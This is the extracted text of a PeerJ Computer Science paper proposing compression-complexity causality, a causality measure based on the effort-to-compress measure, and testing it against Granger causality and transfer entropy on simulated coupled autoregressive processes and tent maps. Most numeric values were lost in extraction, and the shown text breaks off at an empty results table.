( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. even in cases where cause and its effect are inseparable, which is probably true for most real-world processes, the change in the dynamics of processes would contain information about causal influences between them. with this understanding, we propose the novel idea of data-based, model-free interventional complexity causality (icc). in this paper, we formalize the notion of icc using compression-complexity to define compression- complexity causality (ccc). ccc shows some interesting properties. we test ccc on simulated and real datasets and compare its performance with existing model-free causality methods. our results demonstrate that ccc overcomes the limitations of ‘associational’ measures (gc and te) to a large extent. other methods for causality estimation based on compression have been proposed in literature (budhathoki & vreeken, ; wieczorek & roth, ), but the very philosophy behind our method and its implementation are very different from these existing methods. this paper is organized as follows. the idea of dynamical complexity and its specific realization dynamical compression-complexity are discussed in ‘dynamical complexity (dc) and dynamical compression-complexity (cc)’. interventional complexity causality and its specific case compression-complexity causality (ccc) are discussed in ‘interventional complexity causality (icc) and compression-complexity causality (ccc)’. how it is possible to obtain positive and negative values of ccc and what its implications are on the kind of causal influence is detailed in ‘positive and negative ccc’. results and discussion on the performance of ccc and its comparison with existing measures, gc and te, are included in ‘results and discussion’. this is followed by conclusions and future work in ‘conclusions’. a list of frequently used abbreviations is provided at the end of the paper. dynamical complexity (dc) and dynamical compression-complexity (cc) there can be scenarios where cause and effect co-exist in a single temporal measurement or blocks of measurements. for example, this can happen (a) inherently in the dynamics of the generated process, (b) when cause and effect occur at different spatio-temporal scales, (c) when measurements are acquired at a scale different from the spatio-temporal scale of the cause–effect dynamics (continuous or discrete). in such a case, probabilities of joint occurrence is too simplistic an assumption to capture causal influences. on the other hand, the very existence of causality here is actually resulting in a change of joint probabilities/correlations which cannot be captured by an assumption of static probabilities. to overcome this problem, we capture causality using the idea of dynamical complexity. inseparable causal influences within a time series (or between two time series) would be reflected in their dynamical evolution. dynamical complexity (dc) of a single time series x is defined as below - dc( x|xpast )=c(xpast + x)−c(xpast ), ( ) where x is a moving window of length w samples and xpast is a window consisting of immediate past l samples of x. ‘+’ refers to appending, for e.g., for time series a=[ , , ] kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
and b=[p,q], then a+b=[ , , ,p,q].c(x) refers to complexity of time series x.dc, thus varies with the temporal index of x and can be averaged over the entire time series to estimate its average dc. it is important to note that dynamical complexity is very different from complexity rate (cr), which can be estimated as follows - cr( x|xpast )=c(xpast, x)−c(xpast ), ( ) where c(xpast, x) is the joint complexity of xpast and x. complexity rate can be seen as a generalization of shannon entropy rate (cover & thomas, ), the difference being that the former can be computed using any notion of complexity, not just entropy. as is evident from eqs. ( ) and ( ), cr is estimated based on the joint occurrences of x and xpast , while dc captures temporal change in complexity on the evolution of the process. in case of the inseparability of cause and effect, it would be inappropriate to use cr to infer causal relationships. now for this notion of ‘‘complexity’’, that has been referred to in this section several times, there is no single unique definition. as noted in nagaraj & balasubramanian ( b), shannon entropy (shannon, ; cover & thomas, ) is a very popular and intuitive measure of complexity. a low value of shannon entropy indicates high redundancy and structure (low complexity) in the data and a high value indicates low redundancy and high randomness (high complexity). for ergodic sources, owing to shannon’s noiseless source coding theorem (cover & thomas, ), (lossless) compressibility of the data is directly related to shannon entropy. however, robustly estimating compressibility using shannon entropy for short and noisy time series is a challenge (nagaraj & balasubramanian, a). recently, the notion of compression-complexity has been introduced (nagaraj & balasubramanian, a) to circumvent this problem. compression-complexity defines the complexity of a time series by using optimal lossless data compression algorithms. it is well acknowledged that data compression algorithms are not only useful for compression of data for efficient transmission and storage, but also act as models for learning and statistical inference (cilibrasi, ). lempel–ziv (lz) complexity (lempel & ziv, ) and effort-to-compress (etc) (nagaraj, balasubramanian & dey, ) are two measures which fall in this category. as per the minimum description length principle (rissanen, ), that formalizes the occam’s razor, the best hypothesis (model and its parameters) for a given set of data is the one that leads to its best compression. extending this principle for causality, an estimation based on dynamical complexity (compressibility) of time series would be the best possible means to capture causally influenced dynamics. out of the complexity measures discussed before, etc seemed to be most suitable for estimation of dynamical complexity. etc is defined as the effort to compress the input sequence using the lossless compression algorithm known as non-sequential recursive pair substitution (nsrps). it has been demonstrated that both lz and etc outperform shannon entropy in accurately characterizing the dynamical complexity of both stochastic (markov) and deterministic chaotic systems in the presence of noise (nagaraj & balasubramanian, a; nagaraj & balasubramanian, b). further, etc has shown kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
to reliably capture complexity of very short time series where even lz fails (nagaraj & balasubramanian, a), and for analyzing short rr tachograms from healthy young and old subjects (balasubramanian & nagaraj, ). recently, etc has been used to propose a compression-complexity measure for networks (virmani & nagaraj, ). in order to faithfully capture the process dynamics, dc is required to be estimated on overlapping short-length windows of time series data. infotheoretic quantities (like shannon entropy), which are based on the computation of probability densities, are not the ideal choice here (owing to finite-length effects). compression-complexity measures are more appropriate choices. because of the advantages of etc over lz mentioned above, we use etc to formulate our measure of causality discussed in the next section. before that, we describe how individual and joint compression complexities are computed using etc (nagaraj, balasubramanian & dey, ) in the subsections below. etc measure for a time series: etc(x ) since etc expects a symbolic sequence as its input (of length > ), the given time series should be binned appropriately to generate such a sequence. once such a symbolic sequence is available, etc proceeds by parsing the entire sequence (from left to right) to find that pair of symbols in the sequence which has the highest frequency of occurrence. this pair is replaced with a new symbol to create a new symbolic sequence (of shorter length). this procedure is repeated iteratively and terminates only when we end up with a constant sequence (whose entropy is zero since it consists of only one symbol). since the length of the output sequence at every iteration decreases, the algorithm will surely halt. the number of iterations needed to convert the input sequence to a constant sequence is defined as the value of etc complexity. for example, the input sequence ‘ ’ gets transformed as follows: → → → → → . thus, etc( )= . etc achieves its minimum value ( ) for a constant sequence and maximum value (m− ) for a m length sequence with distinct symbols. thus, we normalize the etc complexity value by dividing by m− . thus, normalized etc( )= . note that normalized etc values are always between and with low values indicating low complexity and high values indicating high complexity. joint etc measure for a pair of time series: etc(x,y ) we perform a straightforward extension of the above mentioned procedure (etc(x)) for computing the joint etc measure etc(x,y ) for a pair of input time series x and y of the same length. at every iteration, the algorithm scans (from left to right) simultaneously x and y sequences and replaces the most frequent jointly occurring pair with a new symbol for both the pairs. to illustrate it by an example, consider, x = and y =abacac. the pair (x,y ) gets transformed as follows: ( ,abacac) →( ,abdd) →( ,edd) →( ,fd) →( ,g). thus, etc(x,y )= and normalized value is . it can be noted that etc(x,y )≤etc(x)+etc(y ). kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. interventional complexity causality (icc) and compression-complexity causality (ccc) to measure how the dynamics of a process y influence the dynamics of a process x, we intervene to create new hypothetical blocks of time series data, ypast + x, where ypast is a window of length l samples, taken from the immediate past of the window x. these blocks are created by ‘surgery’ and do not exist in reality in the data that is already collected. 
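To make the ETC and joint ETC procedures described above concrete, a minimal Python sketch is given below. It is our own illustration rather than the authors' reference implementation: tie-breaking among equally frequent pairs and the handling of overlapping occurrences follow our convention, and the function names (etc, etc_norm, etc_joint) are ours.

```python
from collections import Counter

def etc(seq):
    """Effort-to-compress via NSRPS: number of pair-substitution iterations
    needed to reduce the symbol sequence to a constant (or length-1) sequence."""
    seq = list(seq)
    steps = 0
    fresh = 0  # counter for generating new substitution symbols
    while len(seq) > 1 and len(set(seq)) > 1:
        pairs = Counter(zip(seq, seq[1:]))      # adjacent-pair frequencies
        target = pairs.most_common(1)[0][0]     # most frequent pair
        new_symbol = ("sub", fresh)
        fresh += 1
        out, i = [], 0
        while i < len(seq):                     # left-to-right, non-overlapping substitution
            if i + 1 < len(seq) and (seq[i], seq[i + 1]) == target:
                out.append(new_symbol)
                i += 2
            else:
                out.append(seq[i])
                i += 1
        seq = out
        steps += 1
    return steps

def etc_norm(seq):
    """ETC normalised by m - 1 (m = input length), so values lie in [0, 1]."""
    return etc(seq) / (len(seq) - 1)

def etc_joint(x, y):
    """Joint ETC of two equal-length symbol sequences: NSRPS applied to the
    sequence of simultaneously occurring symbol pairs."""
    assert len(x) == len(y)
    return etc(list(zip(x, y)))

# Example (with our tie-breaking convention): the binary sequence '11010010'
# needs 5 substitution steps, so ETC = 5 and normalised ETC = 5/7.
print(etc("11010010"), etc_norm("11010010"))
```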
interventional complexity causality (icc) is defined as the change in the dynamical complexity of time series x when x is seen to be generated jointly by the dynamical evolution of both ypast and xpast as opposed to by the reality of the dynamical evolution of xpast alone. this formulation is actually in line with wiener’s idea, according to which, time series y causes x, if incorporating the past of y helps to improve the prediction of x (wiener, ). while gc is based on the notion of improved predictability and te on the reduction of uncertainty, icc is based on the notion of change in ‘dynamical complexity’ when information from the past of y is brought in, in order to check its causal influence on x. the difference between existing approaches and the proposed measure is that the effect of y on x is analyzed based on ‘associational’ means in case of the former and by ‘interventional’ means in case of the latter. with this formulation, icc is designed to measure effect, like gc and te, and not the mechanism, as in dynamic causal modelling (seth, barrett & barnett, ; barrett & barnett, ). to elaborate on this aspect, icc cannot explicitly quantify the interaction coefficients of the underlying generative model (physical mechanism), but will only estimate causal influence based on change in dynamical complexities. it is, however, expected that icc will be closer to the underlying mechanism than existing methods, because, by its very formulation, it taps on causes and their effects based on dynamical evolution of processes. mathematically, iccypast→ x =dc( x|xpast )−dc( x|xpast,ypast ), ( ) where dc( x|xpast ) is as defined in eq. ( ) and dc( x|xpast,ypast ) is as elaborated below: dc( x|xpast,ypast )=c(xpast + x,ypast + x)−c(xpast,ypast ), ( ) where c(·,·) refers to joint complexity. icc varies with the moving temporal window x and its corresponding ypast , xpast . to estimate average causality from time series y to x, iccypast→ x obtained for all xs are averaged. the above is the generic description of icc that can be estimated using any complexity measure. for the reasons discussed in ‘dynamical complexity (dc) and dynamical compression-complexity (cc)’, we would like to estimate icc using the notion of dynamical compression-complexity estimated by the measure etc. the measure would then become interventional compression-complexity causality. for succinctness, we refer to it as compression-complexity causality (ccc). to estimate ccc, time series blocks xpast , ypast , xpast+ x, and surgically created ypast+ x are separately encoded (binned)— converted to a sequence of symbols using ‘b’ uniformly sized bins for the application of kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. henceforth, the same variables are used to denote the binned/encoded versions of the blocks. etc. for the binned time series blocks, xpast , ypast , xpast + x, ypast + x, to determine whether ypast caused x or not, we first compute dynamical compression-complexities, denoted by cc, cc( x|xpast )=etc(xpast + x)−etc(xpast ), ( ) cc( x|xpast,ypast )=etc(xpast + x,ypast + x)−etc(xpast,ypast ), ( ) equation ( ) gives the dynamical compression-complexity of x as a dynamical evolution of xpast alone. equation ( ) gives the dynamical compression-complexity for x as a dynamical evolution of both xpast and ypast . etc(·) and etc(·,·) refer to individual and joint effort-to-compress complexities. 
for estimating etc from these small blocks of data, short-term stationarity of x and y is assumed. we now define compression-complexity causality cccypast→ x as: cccypast→ x =cc( x|xpast )−cc( x|xpast,ypast ). ( ) averaged ccc from y to x over the entire length of time series with the window x being slided by a step-size of δ is estimated as— cccy→x =cccypast→ x =cc( x|xpast )−cc( x|xpast,ypast ), ( ) if cc( x|xpast,ypast )≈cc( x|xpast ), then cccy→x is statistically zero, implying no causal influence from y to x. if cccy→x is statistically significantly different from zero, then we infer that y causes x. a higher magnitude of cccy→x implies a higher degree of causation from y to x. the length of xpast,ypast , that is l is chosen by determining the correct intervention point. this is the temporal scale at which y has a dynamical influence on x. detailed criteria and rationale for estimating l and other parameters used in ccc estimation: w (length of x), δ and b for any given pair of time series are discussed in section s . ccc is invariant to local/global scaling and addition of constant value to the time series. as ccc is based on binning of small blocks of time series data, it is noise resistant. furthermore, it is applicable to non-linear and short term stationary time series. being based on dynamical evolution of patterns in the data, it is expected to be robust to sub-sampling and filtering. for multivariate data, ccc can be estimated in a similar way by building dictionaries that encode information from all variables. thus, to check conditional causality from y to x amidst the presence of other variables (say z and w ), two time varying dictionaries are built—d that encodes information from all variables (x, y , z, w ) and d′ that encodes information from all variables except y (x, z, w only). once synchronous time series blocks from each variable are binned, the dictionary at that time point is constructed by obtaining a new sequence of symbols, with each possible combination of symbols from all variables being replaced by a particular symbol. the mechanism for construction of these dictionaries is discussed in section s . subsequently, dynamical compression-complexities are computed as: cc( x|d′past )=etc(d ′ past + x)−etc(d ′ past ), ( ) kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. it should be mentioned that, strictly speaking, kl and jsd are not distance measures since they don’t satisfy the triangle inequality. cc( x|dpast )=etc(dpast + x)−etc(dpast ), ( ) where d′past+ x represents the lossless encoding of joint occurrences of binned time series blocks xpast + x, zpast + x, wpast + x and d′past refers to the lossless encoding of joint occurrences of binned time series blocks xpast , zpast and wpast . similarly, dpast + x represents the lossless encoding of joint occurrences of binned time series blocks xpast+ x, ypast + x,zpast + x, wpast + x and dpast refers to the the lossless encoding of joint occurrences of binned time series blocks xpast , ypast , zpast and wpast . conditional compression-complexity causality, cccypast→ x|zpast,wpast , is then estimated as the difference of eqs. ( ) and ( ). averaged conditional compression complexity-causality over the entire time series with the window x being slided by a step-size of δ is given as below: cccy→x|z,w =cc( x|d ′)−cc( x|d). 
( ) positive and negative ccc the dynamical compression-complexities estimated for the purpose of ccc estimation, cc( x|xpast ) and cc( x|xpast,ypast ), can be either positive or negative. for instance, consider the case when cc( x|xpast ) becomes negative. this happens when etc(xpast + x) is less than etc(xpast ), which means that with the appending of x, the sequence xpast has become more structured resulting in reduction of its complexity. the value of cc( x|xpast ) is positive when appending of x makes xpast less structured (hence more complex). similarly, cc( x|xpast,ypast ) can also become negative when etc realizes xpast + x, ypast + x to be more structured than xpast , ypast . when the opposite is true, cc( x|xpast,ypast ) is positive. because of the values that cc( x|xpast ) and cc( x|xpast,ypast ) can take, cccypast→ x can be both positive or negative. how different cases result with different signs of the two quantities along with their implication on ccc is shown in table s of the supplementary material. we see that the sign of cccypast→ x signifies the ‘kind of dynamical influence’ that ypast has on x, whether this dynamical influence is similar to or different from that of xpast on x. when cccypast→ x is −ve, it signifies that ypast has a different dynamical influence on x than xpast . on the contrary, when cccypast→ x is +ve, it signifies that ypast has a dynamical influence on x that is similar to that of xpast . on estimating the averaged ccc from time series y to x, expecting that cccypast→ x values do not vary much with time, we can talk about the kind of dynamical influence that time series y has on x. for weak sense stationary processes, it is intuitive that the influence of y on x would be very different from that on x due to its own past when the distributions of coupled time series y and x are very different. we verify this intuition by measuring probability distribution distances between coupled processes y and x using symmetric kullback–leibler divergence (kl) and jensen–shannon divergence (jsd). the trend of values obtained by these divergence kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. measures is compared with the trend of ccc for different cases such as when ccc is positive or negative. coupled autoregressive (ar) processes were generated as per eq. ( ). also, linearly coupled tent maps were generated as per eqs. ( ) and ( ). symmetric kl and jsd between distribution p and q of coupled processes are estimated as per eqs. ( ) and ( ) respectively. dsymm kl(p,q)=dkl(p‖q)+dkl(q‖p), ( ) where, dkl(p ‖q)= ∑ i p(i)log ( p(i) q(i) ) , dkl(q‖p)= ∑ i q(i)log ( q(i) p(i) ) . ( ) jsd(p ‖q)= d(p ‖m)+ d(q‖m), ( ) where, m = (p+q). kl and jsd values are in unit of nats. curves for kl, jsd and ccc estimated for increasing coupling between ar processes of order and linearly coupled tent maps are shown in figs. and respectively. results for non-linear coupling of tent maps are similar to that for linear coupling and are included (fig. s , section s . ). the values displayed represent the mean over trials. as the degree of coupling is varied for ar processes, there is no clear pattern in kl and jsd values. ccc values increase in the positive direction as expected for increasing coupling, signifying that the dynamical influence from y to x is similar to the influence on x from its own past. 
also, when we took larger number of trials for ar, the values obtained by kl and jsd become confined to a smaller range and seem to converge towards a constant value indicating that the distributions of x and y are quite similar. however, in case of coupled tent maps (both linear and non-linear coupling), as coupling is increased, the divergence between the distributions of the two coupled processes increases, indicating that their distributions are becoming very different. the values of ccc grow in the negative direction showing that with increasing coupling the independent process y has a very different dynamical influence on x compared to x’s own past. subsequently, due to the synchronization of y and x, kl, jsd as well as ccc become zero. with these graphs, it may not be possible to find a universal threshold for the absolute values of kl/jsd above which ccc will show negative sign. however, if the distributions of the two coupled processes exhibit an increasing divergence (when the coupling parameter is varied) then it does indicate that the independent process would have a very different dynamical influence on the dependent one when compared with that of the dependent process’ own past, suggesting that the value of ccc will grow in the negative direction. the fact that kl/jsd and ccc do not have a one-to-one correspondence is because the former (kl and jsd) operate on first order distributions while the latter (ccc) is able to capture higher-order dynamical influences between the coupled processes. for non-stationary processes, our kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. . . . . . . . . s ym m e tr ic k l (a) . . . . . . . . js d (b) . . . . . . c c c (c) figure mean values of divergence between distributions of coupled ar( ) processes using symmetric kullback–leibler (kl) (a) and jensen shannon (jsd) divergences (in nats) (b), and the mean causality values estimated using ccc from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta), as the degree of coupling, � is varied (c). ccc values increase with increasing �. there is no similarity in the trend of kl/jsd to ccc. full-size doi: . /peerjcs. /fig- . . . . . . s ym m e tr ic k l (a) . . . . . . . js d (b) . . . . - . - . . c c c (c) figure mean values of divergence between distributions of linearly coupled tent maps using symmetric kullback leibler (kl) (a) and jensen shannon (jsd) divergences (in nats) (b), and the mean causality values estimated using ccc from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) (c), as the degree of coupling, � is varied. for � < . , ccc and kl/jsd are highly negatively correlated. full-size doi: . /peerjcs. /fig- measure would still be able to capture the kind of dynamical influence, though distributions are not static. both positive and negative ccc imply significant causal influence (ccc≈ implies either no causal influence or identical processes), but the nature of the dynamical influence of the cause on the effect is very different in these two cases. causality turning ‘negative’ does not seem very intuitive at first, but all that it signifies is that the past of the cause variable makes the dynamics of the effect variable less predictable than its (effect’s) own past. 
such a unique feature could be very useful for real world applications in terms of ‘controlling’ the dynamics of a variable being effected by several variables. if a particular cause, out of several causes that makes the caused ‘less predictable’ and has ‘intrinsically different’ dynamics from that of the effect, needs to be determined and eliminated, it can be readily identified by observing the sign of ccc. informed attempts to inhibit and enforce certain variables of the system can then be made. as the existing model-free methods of causality can extract only ‘associational causality’ and ignore the influence that the cause has on dynamics of the caused, it is impossible for them to comment on the nature of this dynamical influence, something that ccc is kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. uniquely able to accomplish. obviously, model based methods give full-fledged information about ‘the kind of dynamical influence’ owing to the model equations assumed. however, if there are no equations assumed (or known), then the sign and magnitude of ccc seems to be the best choice to capture the cause–effect relationship with additional information on the similarity (or its lack of) between the two dynamics. results and discussion a measure of causality, to be robust for real data, needs to perform well in the presence of noise, filtering, low temporal and amplitude resolution, non-uniformly sampled signals, short length time series as well as the presence of other causal variables in the system. in this section, we rigorously simulate these cases and evaluate the performance of ccc measure by comparing with existing measures—granger causality (gc) and transfer entropy (te). owing to space constraints, some of these results are included in section s . in the last sub-section, we test ccc on real-world datasets. in all cases, we take the averaged value of ccc over entire time series as computed by eq. ( ) (or eq. ( ) in the conditional case) and the parameters for ccc estimation are chosen as per the selection criteria and rationale discussed in section s . gc estimation is done using the mvgc toolbox (barnett & seth, ) in its default settings and te estimation is done using mute toolbox (montalto, faes & marinazzo, ). akaike information criteria is used for model order estimation with the maximum model order set to in the mvgc toolbox, except where specified. the maximum number of lags to take for autocorrelation computation is done automatically by the toolbox. in the mute toolbox, the approach of non uniform embedding for representation of the history of the observed processes and of nearest neighbor estimator for estimating the probability density functions is used for all results in this paper. the number of lags to consider for observed processes was set to and the maximum number of nearest neighbors to consider was set to . varying unidirectional coupling ar( ) autoregressive processes of order one (ar( )) were simulated as follows. x and y are the dependent and independent processes respectively. x(t)=ax(t− )+�y (t− )+εx,t ( ) y (t) =by (t− )+εy,t, where a= . , b= . , t = to , s, sampling period = s. � is varied from − . in steps of . . noise terms, εy,εx =νη, where ν = noise intensity = . and η follows standard normal distribution. 
figure shows the performance of ccc along with that of te and gc as mean values over trials, (ccc settings: l= , w = , δ= , b= ). standard deviation of ccc, te and gc values are shown in fig. . with increasing coupling, the causality estimated by ccc, te as well as gc increases. kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. . . . . . . . c c c (a) . . . . . . . t e (b) . . . . . g c (c) figure mean causality values estimated using ccc (a), te (b) and gc (c) for coupled ar( ) pro- cesses, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the degree of coupling, � is varied. ccc, te as well as gc are able to correctly quantify causality. full-size doi: . /peerjcs. /fig- . . . . . . s td . d e v. c c c (a) . . . . . . s td . d e v. t e (b) . . . . . . s td . d e v. g c (c) figure standard deviation of causality values estimated using ccc (a), te (b) and gc (c) for cou- pled ar( ) processes, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the degree of coupling, � is varied. full-size doi: . /peerjcs. /fig- ar( ) autoregressive processes of order hundred (ar( ): x dependent, y independent) were simulated as follows. x(t)=ax(t− )+�y (t− )+εx,t y (t)=by (t− )+εy,t, ( ) where a= . , b= . , t = to , s, sampling period = s. � is varied from − . in steps of . . noise terms, εy,εx =νη, where ν = noise intensity = . and η follows standard normal distribution. figure shows the performance of ccc along with that of te and gc, as mean values over trials (ccc settings: l= , w = , δ= , b= ). maximum model order was set to in the mvgc toolbox. ccc values increase steadily with increasing coupling for the correct direction of causation. te fails as it shows higher causality from x to y for all �. gc also shows confounding of causality values in two directions. thus, causality in coupled ar processes with long-range memory can be reliably estimated using ccc and not using te or gc. range of standard deviation of ccc values from y to x is . to . for varying parameter � and that from x to y is . to . . these values are much smaller than the mean ccc estimates and thus, causality estimated in the direction of causation and opposite to it remain well separable. for te, y to x, standard deviation range is . to kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . . . . . . c c c (a) . . . . t e - (b) . . . . g c - (c) figure mean causality values estimated using ccc (a), te (b) and gc (c) for coupled ar( ) pro- cesses, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the degree of coupling, � is varied. only ccc is able to reliably estimate the correct causal relationship for all values of � while te and gc fail. full-size doi: . /peerjcs. /fig- . and x to y , standard deviation range is . to . . for gc, y to x, standard deviation range is . to . and x to y , standard deviation range is . to . . tent map linearly coupled tent maps were simulated as per the following equations. independent process, y , is generated as: y (t)= y (t− ), ≤y (t− )< / , ( ) y (t)= − y (t− ), / ≤y (t− )≤ . 
the linearly coupled dependent process, x, is as below: x(t)= �y (t)+( −�)h(t), ( ) h(t) = x(t− ), ≤x(t− )< / , h(t) = − x(t− ), / ≤x(t− )≤ , where � is the degree of linear coupling. the length of the signals simulated in this case was , , i.e., t = to , s, sampling period = s and the first , transients were removed to yield , points for causality estimation. figure shows the performance of ccc and te for linearly coupled tent maps as � is varied (ccc settings: l= , w = , δ= , b= ). ccc and te comparison was also done for increasing coupling in the case of non-linearly coupled tent maps. these results are included in the section s . . results obtained are similar to the linear coupling case. the assumption of a linear model for estimation of gc was proved to be erroneous for most trials and hence gc values are not displayed. as � is increased for both linear and non-linear coupling, tey→x increases in the positive direction and then falls to zero when the two series become completely synchronized at �= . . the trend of the magnitude of ccc values is similar to te, however, cccy→x increment is in the negative direction. this is because of the fact that with increasing coupling the kind of dynamical influence kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. . . . . - - - - c c c - (a) . . . . . . t e (b) figure mean of causality values estimated using ccc (a) and te (b) for linearly coupled tent maps, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the degree of cou- pling is increased. with increasing coupling (until synchronization), magnitude of ccc and te values in- creases. ccc values are negative while te are positive. full-size doi: . /peerjcs. /fig- from y to x becomes increasingly different than the dynamical influence from the past values of x to itself. in case of linear coupling, range of standard deviation of ccc values from y to x is . to . for different values of � and that from x to y is . to . . for te, y to x, standard deviation range is to . and x to y , standard deviation range is to . . for non-linear coupling, the range of standard deviation values are included in section s . . for both ccc and te, standard deviation values obtained indicate that there might be confounding in the causality values in the direction of causation and the direction opposite to causation for low values of �. varying process noise the performance of measures as process noise is varied is shown in fig. for coupled ar processes simulated as in eq. ( ), where a= . , b= . , �= . , t = to , s, sampling period= s, number of trials= . noise terms, εy,εx =νη, where ν =noise intensity, is varied from . to . and η follows standard normal distribution. ccc settings: l= , w = , δ= , b= . the range of standard deviation of ccc values from y to x is . to . for different values of � and that from x to y is . to . . for te, y to x, standard deviation range is . to . and x to y , standard deviation range is . to . . for gc, y to x, standard deviation range is . to . and x to y , standard deviation range is . to . . the performance of all three measures is fairly good in this case. only gc values show a slightly increasing trend with increasing noise intensity. non uniform sampling results for causality testing on uniformly downsampled signals are included in the section s . . 
varying process noise
the performance of the measures as process noise is varied is shown in fig. for coupled ar processes simulated as in eq. ( ), where a = . , b = . , ϵ = . , t = to , s, sampling period = s, number of trials = . noise terms ε_y, ε_x = νη, where ν = noise intensity is varied from . to . and η follows the standard normal distribution. ccc settings: l= , w= , δ= , b= . the range of the standard deviation of ccc values from y to x is . to . for different values of ν and that from x to y is . to . . for te, y to x, the standard deviation range is . to . and x to y, the standard deviation range is . to . . for gc, y to x, the standard deviation range is . to . and x to y, the standard deviation range is . to . . the performance of all three measures is fairly good in this case. only gc values show a slightly increasing trend with increasing noise intensity.

figure. mean causality values estimated using ccc (a), te (b) and gc (c) for coupled ar processes, from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the intensity of noise, ν, is varied. all three measures perform well in this case.

non uniform sampling
results for causality testing on uniformly downsampled signals are included in section s .

non-uniformly sampled/non-synchronous measurements are common in real-world physiological data acquisition due to jitters/motion-artifacts as well as due to the inherent nature of signals such as heart rate signals (laguna, moody & mark, ). also, in economics, the case of missing data is common (baumöhl & vỳrost, ). to realistically simulate such a scenario, non-uniform sampling was introduced by eliminating data from random locations of the dependent time series and then presenting the resulting series as a set with no knowledge of the time-stamps of the missing data. the percentage of non-uniform sampling/non-synchronous measurements (α) is the percentage of these missing data points.

ar processes with non-uniformly sampled signals were simulated as per eq. ( ) with b = . , a = . , ϵ = . . noise terms ε_y, ε_x = νη, where ν = noise intensity = . and η follows the standard normal distribution. the length of the original time series, n = , , is reduced upon increasing the percentage of non-uniform sampling α. in order to match the lengths of the two time series, y, the independent time series, is appropriately truncated to match the length of the dependent signal, x (this results in a non-synchronous pair of measurements). ccc settings used: l= , w= , δ= , b= . mean causality estimated for trials using the three measures with increasing α, while ν = . , are shown in fig. .

figure. mean causality values estimated using ccc (a), te (b) and gc (c) for coupled ar processes from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the percentage of non-uniform sampling α is varied. ccc is the only measure that shows reliable, consistent and correct estimates of causality.

linearly coupled tent maps with non-uniformly sampled signals were simulated as per eqs. ( ) and ( ) with ϵ = . . the length of the original time series, n = , is reduced upon increasing the percentage of non-uniform sampling α. in order to match the lengths of the two time series, y, the independent time series, is appropriately truncated to match the length of the dependent signal, x (this results in a non-synchronous pair of measurements). ccc settings used: l= , w= , δ= , b= . mean causality estimated for trials using the three measures with increasing α, while ν = . , are shown in fig. .

figure. mean causality values estimated using ccc (a), te (b) and gc (c) for coupled tent maps from y to x (solid line-circles, black) and x to y (solid line-crosses, magenta) as the percentage of non-uniform sampling is varied. ccc is able to distinguish the causality direction but the separation between values is small. te and gc completely fail.
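a rough illustration of how this non-uniform sampling can be introduced is given below; the percentage α and the input series are placeholders, and the truncation step mirrors the length-matching described above.

```python
import numpy as np

def make_nonuniform(x, y, alpha, seed=0):
    """drop `alpha` percent of the dependent series x at random locations,
    discard the time stamps, and truncate the independent series y to the
    same length, yielding a non-synchronous pair of measurements."""
    rng = np.random.default_rng(seed)
    n = len(x)
    keep = np.sort(rng.choice(n, size=int(n * (1 - alpha / 100)), replace=False))
    x_sparse = x[keep]               # time stamps of removed points are not kept
    y_trunc = y[: len(x_sparse)]     # simple truncation to match lengths
    return x_sparse, y_trunc
```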
as the results clearly indicate, both te and gc fail when applied to non-uniformly sampled coupled ar and tent map processes. ccc values are relatively invariant to non-uniform sampling and thus could be employed in such scenarios.

filtering of coupled signals
acquired data preprocessing often involves low pass filtering to smooth out the signal (teplan, ). at other times, high pass filtering is required to remove low frequency glitches from a high frequency signal. also, when the signals acquired are sampled at low frequencies, the effects due to decimation and filtering may add up and result in poorer estimates of causality. this is often the case in fmri signals (glover, ; kim, richter & uǧurbil, ). to test these scenarios, ar processes were simulated as below:

y(t) = . y(t−1) + ε_y,t
x(t) = . x(t−1) + . y(t−1) + ε_x,t

where the noise terms ε_y, ε_x = νη, with ν = noise intensity = . and η following the standard normal distribution. causality values were estimated using ccc, te and gc when the simulated signals are low pass filtered using a moving average window of length with step size . the results are shown in the table below as mean values over trials. ccc settings used: l= , w= , δ= , b= . the performance of the measures when the coupled signals are decimated to half the sampling rate and then low pass filtered is also included in the table. the length of the original signal simulated is and is reduced to upon filtering and to upon filtering and decimation.

table. mean ccc, te and gc estimates for coupled ar processes y (independent) and x (dependent) as it is, upon filtering, and upon decimation and filtering.

system                  | ccc y→x | ccc x→y | te y→x | te x→y | gc y→x | gc x→y
